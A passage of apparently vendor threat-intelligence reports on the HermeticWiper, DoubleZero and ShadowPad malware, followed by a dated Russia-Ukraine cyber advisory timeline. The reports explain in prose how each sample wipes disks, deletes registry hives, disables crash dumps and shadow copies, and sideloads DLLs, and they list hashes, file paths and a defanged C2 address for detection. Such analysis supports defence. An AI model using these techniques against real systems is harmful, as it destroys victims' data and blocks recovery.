  2. h:\epm2.0\01_projectarea\00_source\epm2\mod.windiskaccessdriver\windiskaccessdriver\objfre_wlh_x86\i386\epmntdrv.pdb
  3. h:\epm2.0\01_projectarea\00_source\epm2\mod.windiskaccessdriver\windiskaccessdriver\objfre_wnet_amd64\amd64\epmntdrv.pdb
  4. h:\epm2.0\01_projectarea\00_source\epm2\mod.windiskaccessdriver\windiskaccessdriver\objfre_wxp_x86\i386\epmntdrv.pdb

Figure 6

Behaviour:

Malware parsing command line arguments and gathering system information.

Figure 7

Malware locating the correct driver version and deploy them as per the OS, version, and system information.

Figure 8

Disable WOW64 Redirection:

After selecting the driver, the malware disables WOW64 Redirection if the OS is 64 bit as this prevents the OS to load 32 bit drivers from WOW64 directory and instead forced the OS to load driver from System32\drivers directory where the malware placed the driver in actual (see Figure9).

Figure 9

Disable Crash Dumps:

The malware access HKLM\SYSTEM\ CurrentControlSet\Control\CrashControl and disabled Crash Dumps by changing the value of “CrashDumpEnabled” to 0 in registry. This is done so that the system is not able to write crash dump on the disk. Crashdump generally contains information about the system crash and status to help debugging and disabling it by malware authors to ensure that system can’t be recovered in any way.

Figure 10

Disable Volume Shadow Service:

To make recovery more difficult, the Volume shadow service is stopped and disabled.

Figure 11

Decompressing Drivers:

Then the driver is decompressed with LZMA algorithm.

Figure 12

Service Started and Configured:

The service is temporarily created to load the driver and process’s token privileges are modified to create the service.

Figure 13

The service is then created, configured, and started.

Figure 14

Malware set privilege “SeBackUpPrivilege” required to manipulate system backups.

Figure 15

Malware fragments the files present on the disk instead of defragmentation and before that it modifies some settings of explorer as shown in Figure16 and the reason most probably is to hide the status of files so that changes can’t be noticed for longer duration to the user as “ShowCompColor” displays compressed and encrypted NTFS files in color while “ShowInfoTip” Shows pop-up descriptions for folder and desktop items.

Figure 16

Excluding Folders:

The malware excluded standard windows folder and not corrupting standard files to avoid making system instable while doing its operation.

Figure 17

Corrupting Disk:

The malware used the installed driver to overwrite hard disk data and for it the malware used the \Device\EPMNTDRV symbolic link, communicates through DeviceIOControl API and pass IOCTL codes to driver to do specific task.

Figure 18

The malware iterates through all physical drives through \\.\PhysicalDrive one at a time and junk data is written to different locations on disk to corrupt it. Further, the partitions on each physical disk are enumerated and find whether it is FAT or NTFS and file system, then the malware wipes reserved sectors (see Figure19). Multiple threads are executed by the malware to perform various activities (see Figure20)

Figure 19

Figure 20

IOCTLs Calling:

The malware works silently in the background, and it calls various IOCTLs for retrieving details about disks.

Figure 21

System Inoperable:

After complete operation, the disk gets corrupted. If we restart the system, the operating system will no longer work, and screen greet the victim with message “Operating System Missing” as shown in Figure22.

Figure 22

Conclusion:

Earlier also Wiper campaigns were effective tool in hand of criminals and hermetic wiper is one of the latest in view of Russia-Ukraine conflict. The pro-Russian malware authors used it to target organizations in Ukraine. The malware is designed to done maximum damage on victim machine which includes corrupting MBR, corrupting file system and trash individual files to make system inoperable.

List of IOCs:

Sr No. Indicator Type Remarks
1 84ba0197920fd3e2b7dfa719fee09d2f MD5 HermeticWiper EXE File
2 a952e288a1ead66490b3275a807f52e5 MD5 DRV_X64 Compressed
3 6106653b08f4f72eeaa7f099e7c408a4 MD5 DRV_X64 DeCompressed
4 231b3385ac17e41c5bb1b1fcb59599c4 MD5 DRV_X86 Compressed
5 093cee3b45f0954dce6cb891f6a920f7 MD5 DRV_X86 DeCompressed
6 095a1678021b034903c85dd5acb447ad MD5 DRV_XP_X64 DeCompressed
7 bdf30adb4e19aff249e7da26b7f33ead MD5 DRV_XP_X64 DeCompressed
8 eb845b7a16ed82bd248e395d9852f467 MD5 DRV_XP_X86 DeCompressed
9 d57f1811d8258d8d277cd9f53657eef9 MD5 DRV_XP_X86 DeCompressed
10 h:\epm2.0\01_projectarea\00_source\epm2\mod.windiskaccessdriver\ windiskaccessdriver\objfre_wlh_amd64\amd64\epmntdrv.pdb PDB Path DRV_X64
11 h:\epm2.0\01_projectarea\00_source\epm2\mod.windiskaccessdriver\ windiskaccessdriver\objfre_wlh_x86\i386\epmntdrv.pdb PDB Path DRV_X86
12 h:\epm2.0\01_projectarea\00_source\epm2\mod.windiskaccessdriver\ windiskaccessdriver\objfre_wnet_amd64\amd64\epmntdrv.pdb PDB Path DRV_XP_X64
13 h:\epm2.0\01_projectarea\00_source\epm2\mod.windiskaccessdriver\ windiskaccessdriver\objfre_wxp_x86\i386\epmntdrv.pdb PDB Path DRV_XP_X86

Mitre Attack Tactics and Techniques: (Based on our analysis)

Sr No. Tactic Technique
1 Privilege Escalation (TA0004) T1134 Access Token Manipulation
2 Discovery (TA0007) T1082 System Information Discovery
T1083 File and Directory Discovery
3 Defense Evasion (TA0005) T1112 Modify Registry
4 Execution (TA0002) T1106 Native API
5 Persistence (TA0003) T1543.003 Create or Modify System Process: Windows Service
6 Impact (TA0040) T1561.003 Disk Wipe: Disk Structure Wipe
T1489 Service Stop
T1490 Inhibit System Recovery
T1529 System Shutdown/Reboot

Doublezero Wiper Malware Report

Doublezero Wiper Malware Report

Date: 04-April-22
Author: Manoj Kumar (Cyfirma-Malware Research Team)

Suspected Malware: Doublezero wiper Malware
Function: Destructor
Risk Score: 8
Confidence Level: High
Threat actor Associations: Unknown
First Seen: March 2022
DeCyfir presence: Yes

Executive Summary:

Doublezero is a data wiper malware, which destroys files, registry keys, and trees on the Victim machine. On March 17, 2022, the computer emergency Response team of Ukraine discovered malware dubbed “DoubleZero” that targeted Ukrainian enterprises during Russia’s invasion of Ukraine. This malware deletes registry hives (HKCU, HKU, HKLM) , terminate the “lsass” process, get full access control to wipe out non-system and system files.

DoubleZero Analysis:

Sample Details:
File Type: Windows PE
Architecture: 32 Bit
MD5: B4F0CA61AB0C55A542F32BD4E66A7DC2
SHA256: 30B3CBE8817ED75D8221059E4BE35D5624BD6B5DC921D4991A7ADC4C3EB5DE4A
Subsystem: Console

It is still unclear on the initial access for the malware. It is believed that the targeted systems were already compromised, and the malware was executed during the invasion of Ukraine by Russians.

This malware was written in .net programing language. This date wiper malware has customized obfuscation and a huge amount of junk code that makes malware reverse engineering harder to analyze these codes fully. This malware binary shows a compile-time is 12 Oct 2093.

This malware has a method, which enumerates the list of domain controllers connected to the infected host. When the malware is executed, it first checks if the compromised machine is one of the domain controllers. If this host is one of the domain controllers, the malware will not be executed. Threat actor added a large junk of unwanted code across this malware codes.

This malware first destroys non-system files, after that it will overwrite system-related files. This wiper malware hardcoded a specific list of the file location in their code as shown in the below figure. This malware before executing the destructive routine, it will list several directory names and paths where it will look for files it will wipe out.

Apart From the above-listed directory, this wiper malware gets all the available (mounted) drivers to the compromised host by the below code snippets.

Doublezero wiper malware adjusts the privileges on the compromised system by RtlAdjustPrivilege API.

SeTakeOwnershipPrivilege 9UL
SeRestorePrivilege 18UL
SeBackupPrivilege 17UL
SeShutdownPrivilege 19UL

Privileges

This wiper malware enumerated the running process and look the process name with the name “lsass “, then terminate that process(“lsass”).

This wiper malware changes the current logon user as an owner of this registry hives then modifies access control to full access control to delete the following entries from the registry.

  1. HKCU
  2. HKU
  3. HKLM
  4. HKLM\BCD

This malware also adjusts the security identifier of its process to obtain full control of file system rights to avoid being denied while overwriting the files.

Then it opens the target files by native API NtOpenFile, after that it is calling native API NtFsControlFile with a control code of FSCTL_SET_ZERO_DATA , which overwrites files with zero bytes. This malware has two wiping routines. This is one the routine

For example, the below screenshot showing after executing the file contents zero out by this malware.

The second routine, the wiper malware use file. FileStream.Write () a method to fill up the file with all zero bytes.

This malware will shut down the system by ExitWindowsEx API call, once the destructive activity is completed.

Conclusion:

While geopolitical issues between Russian and Ukrainian, the unknown cyber threat actors targeted Ukrainian enterprises by Doublezero wiper malware, which is 4th data wiper malware attack has been seen over the past two months against Ukrainian such as “CaddyWiper” ,”HermeticWiper” and “WhisperGate. Threat actors spread this malware by spear-phishing attacks(zip files name was” Virus … extremely dangerous !!!. Zip). This malware has the capability to wipe out system and non-system files and reboot the infected system. This data wiper malware modifies the full access rights to delete registry hives (HKCU, HKU, HKLM) and wipe out files.

Recommendations:

  1. Set up DMARC (Domain-based Message Authentication Reporting & Conformance) to stop phishers from spoofing your domain (that is, making their emails look like they come from your organization).
  2. Consider the following multi-layered protection program:
    1. An anti-spam engine that reduces risks by preventing spam.
    2. Anti-evasion technology that prevents advanced evasion techniques that use embedded files and malicious URLs.
    3. Threat intelligence to protect against emerging threats.
    4. Anti-phishing engines to prevent any type of phishing attack before it reaches users.
    5. Anti-spoofing technology to keep users protected against social engineering, payload-less attacks.
    6. Antivirus software for emails to minimize the risk of being infected by malware through email.
    7. Detection to prevent advanced attacks, such as APTs and zero-day attacks that conventional defenses miss out.
  3. Assess and deploy alternatives for an advanced endpoint protection solution that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.
  4. A data breach prevention plan must be developed considering (a) the type of data being handled by the company; (b) the treatment given; (c) where and how the data is stored; (d) if there is an obligation to notify the local authority.
  5. Plan periodic ‘Red Herring’ phishing attack simulations within the organization, and counsel participants that fail the test with additional security training.
  6. Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.
  7. Exert caution when opening email attachments or clicking on embedded links supplied via email communications. 
  8. Limit administrative access to employees who need them.
  9. Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed because vulnerabilities are one of the top attack vectors.
  10. Use Data Loss Prevention (DLP) technologies to detect malicious instances of data exfiltration.
  11. Use encryption systems like Pretty Good Privacy (PGP) for communication involving sensitive information or dialogue.
  12. Use of network segmentation within converged IT/OT environment as a critical security control based on network type, purpose, access privileges to limit the snowball effect in an event of a compromise of a network segment.
  13. Ensure active network infrastructure monitoring armed with Next-generation security solutions that enable real-time monitoring of any policy violations, data leaks, anomalous activity, and potential threats.
  14. Employ backup systems to restore data if attacked. Ideally, these backup systems should not be attached or connected to the main network.

List of IOCs:

Sr No. Indicator Type Remarks
1 B4F0CA61AB0C55A542F32BD4E66A7DC2 MD5 Hash Sample File
2 30B3CBE8817ED75D8221059E4BE35D5624BD6B5DC921D4991A7ADC4C3EB5DE4A SHA256 Hash Sample File

Mitre Attack Tactics and Techniques:

Sr No. Tactic Technique
1 Initial Access (TA0001) T1566.001:Spearphishing Attachment
2 Execution (TA0002) T1204.002: Malicious File
3 Privilege Escalation (TA0004) T1543:Create or Modify System Process
4 Defense Evasion (TA0005) T1562.001: Disable or Modify Tools
T1222:File and Directory Permissions Modification
T1112: Modify Registry
T1027: Obfuscated Files or Information
5 Discovery (TA0007) T1083: File and Directory Discovery
T1057: Process Discovery
6 Impact (TA0040) T1561.001:Disk Content Wipe
T1529: System Shutdown/Reboot

Shadowpad Malware Report

ShadowPad Malware Report

Suspected Malware: ShadowPad Malware

Function: Backdoor

Risk Score: 8

Confidence Level: High

Threat actor Associations: China-Based Threat Actors (like Tick, APT41)

Used in Campaigns: CCleaner, NetSarang, ShadowHammer

First Seen: 2015

 

Executive Summary

ShadowPad is a modular backdoor considered to be the successor of PlugX. ShadowPad constitutes various plugins having specific functionality and the malware has the capability to “plug” or “unplug” these plugins at run-time in shellcode format. It can also load additional plugins dynamically from the C2 server when required. ShadowPad is accessed by a limited set of attackers which includes APT41 and Tick group. Since shadowPad is a sophisticated backdoor with a complete set of capabilities, the attackers used it for long-term espionage in the target environment. Further, many threat actors stopped developing their own backdoor after shadowPad and adopted it as their tool of operation due to significant cost reduction in development & maintenance.

Encrypted shadowPad main file has payloads embedded in it and load malicious DLL using DLL sideloading on a legitimate executable.

 

ShadowPad Analysis

Sample Details:

File Type: Windows PE Executable

Architecture: 64 Bit

MD5: 5f3093473ae4167fd51d4282fce73741

SHA256: f7ef194f2dcc341ba03f76872cb7c0dfbae8f79118f99cf73dfccfb146c4e966

Subsystem: GUI

Language: MS Visual C++

Compilation Time: 22 March 2021

Embedded Files:

 

The malicious file contains three embedded files. One is executable, the second is dll and the third is the .dat file (see Figure1). Our research team extracted all and further analyse them.

Embedded .dat File:

MD5: 3db6f7535816e28dd55607d0a60ee9f2

SHA256: d05f80d5ccb1b6d4aea847ad38ef7e8ab619ff33601aa54cc836704e4fb53520

 

Embedded .dll File:

MD5: ad82d23accb10b4c0fc7f8c9782ae6ad

SHA256: 1e06fd5b9aa0e5260369e52ec2d9f87060941de835234afd198b1d4c0b161678

 

Embedded .exe File:

MD5: 8fdf8e4ecff114c1e6c9827c53742a1c

SHA256: 2e642afdd36c129e6b50ae919ca608ac0006ce337f2a5a7a6fb1eef6a4ad99e7

 

Figure1

 

Execution/Dropped Files:

Upon execution, the malware creates a new instance of itself, dropped the embedded executable file with the name “OLEVIEW.exe” in the temp folder, and spawns a child with the same name. It also copies the “OLEVIEW.exe” to the System32 folder with the name wsuhost.exe and drops the DLL into system32 with the name “IVIEWERS.dll”. To avoid detection and gain persistence, wsuhost.exe runs as a service and spawns a child with the name “svchost.exe” and terminates itself.

Note: The embedded DLL is the same (in functioning and other parameters like hashes corresponding to different sections, resources, etc.) as dropped DLL (IVIEWERS.dll) but has a different file hash means some modification is done by the malware while dropping the embedded DLL and the hash of dropped “IVIEWERS.dll” for different run instances is different.

Figure2

 

C2 Communication:

The svchost process communicates with “http[:]//fljhcqwe[.]com:80” at regular intervals.

 

Figure3

 

Meta Data:

The malware requires administrative privileges to run.

 

Figure4

 

The Icon is used for wsuhost.exe process as shown in Figure5 and executes as a service (see Figure6).

Figure5

 

Figure6

Code Snippets:

Sandbox evasion techniques implemented in “IVIEWERS.dll”

 

 

Figure7

 

The main malware file (f7ef194f2dcc341ba03f76872cb7c0dfbae8f79118f99cf73dfccfb146c4e966) drops two files “OLEVIEW.exe” and “IVIEWERS.dll” from its resource section to disk in folder returned by GetTempPathA and executes “OLEVIEW.exe” and it will further load the malicious “IEVIEWERS.dll”. Logic related to drop other files helper.exe, flsh.exe, IEViewers.dll.dat are also embedded in the same way (see Figure 8).

Encrypted payloads are embedded in the main malware file and DLL sideloading is used to load malicious DLL (IEViewers.dll) by sideloading legitimate executable (OLEVIEW.exe) vulnerable to DLL search order hijacking which is further used to load and decrypt another file (IVIEWERS.dll.dat).

 

 

Figure8

 

Capabilities

The libraries and APIs imported by the malware further provide insights towards the following capabilities possessed by the malware:

  1. Multiple Anti-debugging capability.
  2. Sandbox evasion capability.
  3. Synchronization capability to handle multiple processes and threads and to access shared resources.
  4. Capability to handle windows/GUI functions.
  5. Capability to access registry entries and manipulate them.
  6. Capability to inject malicious code into a valid process.
  7. Ability to handle, write, and access files.
  8. Capability to handle command-line arguments and command execution.
  9. Capability to load other libraries, processes, and DLLs in memory.
  10. Ability to sleep and hide the functionality.
  11. Network communication capability.
  12. Encryption/Decryption capability.

 

Conclusion

ShadowPad is a sophisticated, well-developed backdoor and sold privately to a selected set of customers with a complete or partial set of plugins as per the requirement and it reduces the cost of development and maintenance for threat actors willing to use this fully functional backdoor.  It is under continuous development and enhances its capabilities with time. The adoption of any sold or cracked version of this malware raises the difficulty for researchers to surely attribute it to the right threat actors and require long-term monitoring and cautious validation. Malware sample has the functionality to communicate with C2 server, dropped malicious payloads, execute them, modify registries, and add or remove plugins at run time through a controller framework at a remote location.

 

List of IOCs

Sr No.

Indicator Type Remarks

1

5f3093473ae4167fd51d4282fce73741

MD5 Hash

Main File

2 8fdf8e4ecff114c1e6c9827c53742a1 MD5 Hash OLEVIEW.exe/wsuhost.exe
3 ad82d23accb10b4c0fc7f8c9782ae6ad MD5 Hash Embedded IVIEWERS.dll
4 84d9d5cae48242e3a2ae838dc31e96a4 MD5 Hash Dropped IVIEWERS.dll
5 f7ef194f2dcc341ba03f76872cb7c0dfbae8f79118f99cf73dfccfb146c4e966 SHA256 Hash Main File
6 2e642afdd36c129e6b50ae919ca608ac0006ce337f2a5a7a6fb1eef6a4ad99e7 SHA256 Hash OLEVIEW.exe/wsuhost.exe
7 1e06fd5b9aa0e5260369e52ec2d9f87060941de835234afd198b1d4c0b161678 SHA256 Hash Embedded IVIEWERS.dll
8  

9494a3d8296002a0d2f9473fbace9edb5639c60168bf2e12077d8513ba9ba20f

SHA256 Hash Dropped IVIEWERS.dll
9 C:\Users\%UserName%\AppData\Local\Temp Path Dropped File OLEVIEW.exe
10 C:\Windows\System32\wsuhost.exe Path File wsuhost.exe
11 C:\Windows\System32\IVIEWERS.dll Path IVIEWERS.dll
12 http[:]//fljhcqwe[.]com:80 URL C2 Communication
13 c:\users\administrator\source\repos\consoleapplication6\x64\release\consoleapplication6.pdb Path

PDB Path

 

Mitre Attack Tactics and Techniques 

Sr No. Tactic Technique
1 Privilege Escalation (TA0004) T1055 Process Injection
T1055.001 DLL Injection
2 Defense Evasion (TA0005) T1027 Obfuscation Files or Information
T1112 Modify Registry
T1055 Process Injection
T1055.001 DLL Injection
3 Discovery (TA0007) T1057 Process Discovery
T1082 System Information Discovery
T1124 System Time Discovery
4 Command & Control (TA0011) T1071.001 Web Protocols
5 Exfiltration (TA0010) T1029 Scheduled Transfer

 

 

Emerging Cyber Threats in the Ongoing Russia-Ukraine Conflict

Emerging Cyber Threats in the Ongoing Russia-Ukraine Conflict

Geopolitical Advisory

[10 May 2022, Version 13, NEW]
Docker Images Used by Pro-Ukraine Hackers to DDoS Russian Websites

This week researchers observed a plethora of distributed denial-of-service (DDoS) attacks on Russian and Belarusian websites. The targeted websites are managed by either the respective governments of these two nations, military organizations, or media houses.

It is suspected that pro-Ukrainian threat actors, probably backed by Ukraine’s IT Army – are behind this attack. Researchers note that the two Docker images used in this attack were being deployed between February and March.

On sample analysis it was found that the compromised honeypot Docker image contains a Go-based HTTP benchmarking tool named bombardier with SHA256 hash 6d38fda9cf27fddd45111d80c237b86f87cf9d350c795363ee016bb030bb3453 that uses HTTP-based requests to stress-test a website.

Recommendations:

  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs, and strengthening defenses based on tactical intelligence provided.
  • Assess and deploy alternatives for an advanced endpoint protection solution that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.
  • Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, active network monitoring, through next-generation security solutions, and ready to go incident response plan.
  • Consider implementing Network Traffic Analysis (NTA), and Network Detection and Response (NDR) security systems to compensate for the shortcoming of EDR and SIEM solutions.
  • Consider running scans and perform periodic audits to help identify future misconfigurations or missing patches.
  • Install anti-APT and EDR solutions, enabling threat discovery and detection, investigation, and timely remediation of incidents capabilities.

[29 April 2022, Version 12]
CERT-UA Warns of Ongoing DDoS Attacks

Ukraine’s Computer Emergency Response Team (CERT-UA) has published an advisory warning of the ongoing Distributed Denial-of-Service (DDoS) attacks which target Government web portals as well as Pro-Ukraine websites.

As per the advisory, threat actors are compromising WordPress-based websites. This was done by injecting malicious JavaScript code which is placed in the HTML structure of the main files of the website. These codes are base64-encoded to evade detection.

Some of the targeted websites include:

  • kmu.gov.ua (Ukrainian government portal)
  • callrussia.org (project to raise awareness in Russia)
  • gngforum.ge (inaccessible)
  • secjuice.com (infosec advice for Ukrainians)
  • liqpay.ua (inaccessible)
  • gfis.org.ge (inaccessible)
  • playforukraine.org (play-based fundraiser)
  • war.ukraine.ua (news portal)
  • micro.com.ua (inaccessible)
  • fightforua.org (international enlistment portal)
  • edmo.eu (news portal)
  • ntnu.no (Norwegian university site)
  • megmar.pl (Polish logistics firm)

Recommendations:

  • Deploy appropriate hardware that can handle known attack types and use the options that are in the hardware that would protect network resources. Again, while bolstering resources will not prevent a DDoS attack from happening, doing so will lessen the impact of an attack.
  • Opt for DDoS prevention providers who can implement cloud scrubbing services for attack traffic to remove most of the problematic traffic before it ever hits a victim’s network.
  • Keep your website’s content management systems (CMS) up to date.
  • Use the latest available version of any active plugins.
  • Restrict access to the website management pages.

[22 April 2022, Version 11]
Joint Advisory Released by US and Allied Cybersecurity Authorities

A recent advisory was released by the cyber authorities of the United States, Australia, Canada, New Zealand, and the United Kingdom to warn organizations about the Russian state-sponsored and criminal cyber threats to critical infrastructure.

The Cybersecurity and Infrastructure Security Agency (CISA) authored “Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure” in partnership with the Federal Bureau of Investigation (FBI), National Security Agency (NSA), Australian Cyber Security Centre (ACSC), Canadian Centre for Cyber Security (CCCS), National Cyber Security Centre New Zealand (NZ NCSC), and the United Kingdom’s National Cyber Security Centre (NCSC-UK) and National Crime Agency (NCA), and with contributions from industry members of CISA’s Joint Cyber Defense Collaborative.

As per the advisory, the Russian invasion of Ukraine could expose organizations both within and beyond the region to increased malicious cyber activity. As per experts, these activities might be a response to the unprecedented economic costs imposed on Russia as well as the material support provided by the United States and U.S. allies and partners.

Final Takeaways:

  • Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed because vulnerabilities are one of the top attack vectors.
  • Use multi-factor authentication (MFA) to mitigate credential theft and prevent attacker access. Keep MFA always-on for privileged accounts and apply risk-based MFA for normal accounts.
  • Secure and monitor remote desktop protocol and other risky services.
  • Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.

[19 April 2022, Version 10]
Ukraine’s Energy Provider Targeted by Industroyer2 Malware

It has been observed that the energy providers in Ukraine have been targeted by a new variant of Industroyer malware – dubbed Industroyer2. The threat actor Sandworm (reportedly linked to the Russian State Security Services) is suspected to be behind this attack. In collaboration with CERT-UA, the researchers discovered that Sandworm made attempts to implant Industroyer2 malware against Ukrainian high-voltage electrical substations. The threat actor groups, in addition to Industroyer2, used other malware families including CaddyWiper, ORCSHRED, SOLOSHRED, and AWFULSHRED. At this point, researchers are unclear about the initial access vector, and nor are they sure about how the threat actor moved from IT to the ICS network.

Final Takeaway:

  • As per researchers, on analyzing the timestamps of Industroyer2’s compilation and scheduled task entry created from an infection, it has been assessed that the threat actor had prepared the attack at least two weeks in advance.
  • Researchers also highlight that the new variant Industroyer2 malware is believed to be based on the same source code as Industroyer with high confidence. The new malware variant is highly configurable and has detailed hardcoded configuration in its body as opposed to Industroyer which stored configuration in an .INI file. The said configuration essentially drives the action of the malware and therefore, the attackers are required to compile Industroyer2 for each new victim or environment. Researchers assess that this limitation is not going to hinder Sandworm.

Recommendations:

  • Build and undertake safeguarding measures by monitoring/ blocking the IOCs, and strengthening defenses based on tactical intelligence provided.
  • Block exploit-like behavior. Monitor endpoints memory to find behavioral patterns that are typically exploited, including unusual process handle requests. These patterns are features of most exploits, whether known or new. This will be able to provide effective protection against zero-day/critical exploits and more, by identifying such patterns.
  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Take advantage of global CTI feeds providing valuable insights on threat actor activity, detection, and mitigation techniques to security teams.
  • Ensure backups of critical systems are maintained, which can be used to restore data in case a need arises.
  • Employ robust endpoint security options that will allow your IT team to identify what confidential information is being stolen, when, and through what specific channel or device.

[05 April 2022, Version 9]
AcidRain: The Newest Wiper Malware in the Russia-Ukraine Crisis

Post the multifaceted and deliberate cyberattack launched against Viasat’s KA-SAT network, researchers have discovered a new wiper malware named AcidRain. This is an ELF MIPS malware that wipes modems and routers.

Viasat has confirmed the use of this malware in the attack on its modems on the 24th of February. As per researchers, AcidRain can destroy all files inside a compromised machine by overwriting files leaving them unusable after the data wiping processes are completed. AcidRain is the 7th malware wiper used by Russia in the ongoing war with Ukraine. The other notable ones are WhisperKill, WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, and DoubleZero.

There is a section of researchers in the threat intel community which believes that this wiper malware was specifically designed to launch cyberattacks in Ukraine, though there is no clear evidence available at the moment.

[04 April 2022, Version 8]
As per the recent incident report released by Viasat, on 24th February 2022 “a multifaceted and deliberate cyberattack” was launched against its KA-SAT network which led to a partial interruption of KA-SAT’s consumer-oriented satellite broadband service. The company has confirmed that the cyber attack did impact several thousand customers located in Ukraine and tens of thousands of other fixed broadband customers across Europe.

According to Viasat, the incident was localized to a consumer-focused partition of the KA-SAT network. High volumes of focused, malicious traffic were detected emanating from several SurfBeam2 and SurfBeam 2+ modems and/or associated customer premise equipment (CPE) physically located within Ukraine and serviced by one of the KA-SAT consumer-oriented network partitions. This targeted denial of service attack made it difficult for many modems to remain online.

The cyber attackers leveraged “a misconfiguration in a VPN appliance to gain remote access to the trusted management segment of the KA-SAT network.”

Final Takeaway:

  • The satellite internet provider has not mentioned any suspected threat actor or country of origin for this cyberattack. Yet, as per our cyber threat intelligence team, the coincidence of this cyberattack on Ukrainians in the backdrop of the ongoing Russia Ukraine crisis cannot be ruled out. These cyber-attacks could be retaliatory measures taken by pro-Russian groups against the US and its allies for imposing sanctions against Russia in the ongoing conflict.
  • Vulnerable VPNs have emerged as one of the most common attack vectors. Apart from exploiting the vulnerabilities for DoS attacks and malware implants, there have been instances wherein ransomware groups have leveraged it for double extortion.

Recommendations:

  • Implement an advanced endpoint protection solution (EDR) that provides detection/prevention of malicious activities that do not rely on signature-based detection methods.
  • Establish a robust security posture that is thoughtfully layered with a series of security mechanisms and controls in the network to protect the confidentiality, integrity, and availability of critical data.
  • In case of running a vulnerable version at any point in time, disable all VPNs (SSL-VPN or IPSEC) until the following remediation steps have been taken:
  • Immediately upgrade to the latest available release.
  • Regardless of the upgrade, a user password reset must be followed.
  • Consider all credentials as potentially compromised and initiate an organization-wide password reset.
  • Intimate users to reset their passwords by explaining the reason.
  • Leverage third-party credential leak monitoring services.

[ 31 March 2022, Version 7]
5 weeks since the Russia-Ukraine war, its repercussions from the cybersecurity angle are being experienced in major parts of the world.

Here is a timeline of the major events in the Russia-Ukraine crisis:

30 March 2022

  • Viasat Confirms Cyberattack: The U.S.-based satellite internet provider, Viasat confirmed a ‘multifaceted and deliberate cyberattack’ which was limited to European customers, including several thousand located in Ukraine.
  • Gamaredon Targets NATO: The Russian APT Group Gamaredon, was observed phishing accounts of NATO and Eastern European militaries in addition to existing campaigns against American NGOs, a Ukrainian defense contractor, and a Balkan military.

29 March 2022

    Russian Hackers Scan US Energy Systems: As per the FBI, Russian state-sponsored cyber criminals pose a “current” threat to American national security – with Russian hackers scanning the systems of energy companies and other critical infrastructure.

28 March 2022
Ukrtelecom Hit by Cyberattack: Ukraine’s state-owned telecommunications company – experienced a “powerful” cyberattack, which was eventually repelled as per the Ukrainian government officials and company representatives.

24 March 2022
SAP out of Russia: German business software giant SAP shut its cloud operations in Russia.

22 March 2022
5 US Energy Firms Scanned: FBI releases an advisory on hackers associated with Russian internet addresses who have been scanning the networks of five US energy companies in a possible prelude to hacking attempts.

21 March 2022
Need to strengthen US Healthcare Cybersecurity: Department of Health and Human Services is urged healthcare organizations to review and bolster defenses to guard against possible fallout from the Russian invasion of Ukraine.

18 March 2022
SaintBear Targets Ukraine: Ukraine is being targeted with fake translation software by the suspected threat actor UAC-0056 aka SaintBear. The threat actor has been observed to be deploying Cobalt Strike, GrimPlant, and GraphSteel.

15 March 2022
CaddyWiper Targets Ukraine: The malware was observed targeting Ukraine is designed to wipe data across the Windows domains it is deployed on.

14 March 2022
Rise in Phishing Attacks: Ukraine witnessed a rise in the use of phishing emails as the primary attack vector to further execute scams and deliver malicious malware (including, but not limited to Remote Access Trojans/ RAT) since the Russian invasion.

13 March 2022
Rosneft Hit by Cyberattack: The Russian Energy company’s German subsidiary suffered cyberattacks.

11 March 2022
Series of DDoS Attacks on Russian Websites: Russian company websites were hit by increased hacking attempts.
Broadband Cyberattacks Disrupted: Western intelligence agencies investigate unidentified hackers who disrupted the broadband satellite Internet access in Ukraine.

8 March 2022
ISP’s Quit Russia: Internet Service Providers, Cogent Communications and Lumen Technologies stop their internet services in Russia.

7 March 2022
IsaacWiper Launched on Ukraine: Data wiper malware named “IsaacWiper” – suspected to be part of Russian sabotage arsenal, deployed on Ukrainian government infrastructure.

2 March 2022
Patriotic Emotions Gets the Better of Conti Ransomware Group: A new Twitter account named “Contileaks” emerged, which is – suspectedly created by a pro-Ukraine member of the ransomware group – in an effort towards “Glory to Ukraine” has leaked what our threat intelligence team regards as precious classified information.

1 March 2022
Russian Power Grid and Railways Attacked: In an attempt to strike back at Russia over its Ukraine invasion, a Ukraine-based cyber guerrilla warfare group plans to launch digital sabotage attacks against critical Russian infrastructure.

28 February 2022
FoxBlade Trojan Launched on Ukraine: Hours before the Russian invasion, Ukraine witnessed a cyberattack by FoxBlade – a trojan that has DDoS capabilities.

27 February 2022
US Banks Gear Up for Cyberattacks: Post sanctions on Russia, US banks strengthen their cyber defense keeping retaliatory cyberattacks from Russia.

26 February 2022
Internet Shut Down in Ukraine: As Russian troops advanced in Ukraine, the country faces a major internet knockout.
Official Russian Website Offline: As several Russian governments and state media websites suffered DDoS attacks, the official website of the Kremlin went offline.

25 February 2022
Conti Sides with Russia: In the emerging Russia-Ukraine crisis, the Conti ransomware group sides with Russia and vows to “retaliate in case the Western warmongers attempt to target critical infrastructure in Russia.
Ukrainian Personnel Attacked by Phishing Attacks: Belarus-based hackers launch phishing attacks targeting Ukrainian military personnel.

24 February 2022
Russian Government Websites Down: The websites of the Russian government, State Duma, and Russian President were intermittently unavailable in Russia and Kazakhstan.
Ukraine Calls on Hacker Underground: Ukrainian Government called for support from hackers underground to conduct espionage against Russia and protect critical infrastructure.

23 February 2022
Linux Systems Attacked by Sandworm: Russian APT hacking group Sandworm allegedly attacked UK and US agencies.
Ukraine Attacked by Wiper Malware: Ukrainian enterprises have been attacked by a new wiper malware, which was witnessed in Latvia and Lithuania.

18 February 2022
Ukraine Suffers SMS Spam and DoS Attacks: Cyber Officials in the US found evidence of massive DoS and SMS Spam campaigns in Ukraine – originating in Russia.

11 January 2022
Joint Alert Released on Cyberattacks: The National Security Agency, Cybersecurity Infrastructure and Security Agency, and the FBI have released a joint alert warning of ongoing targeted cyberattacks from Russian state-sponsored cyber operations.

[ 18 March 2022, Version 6]
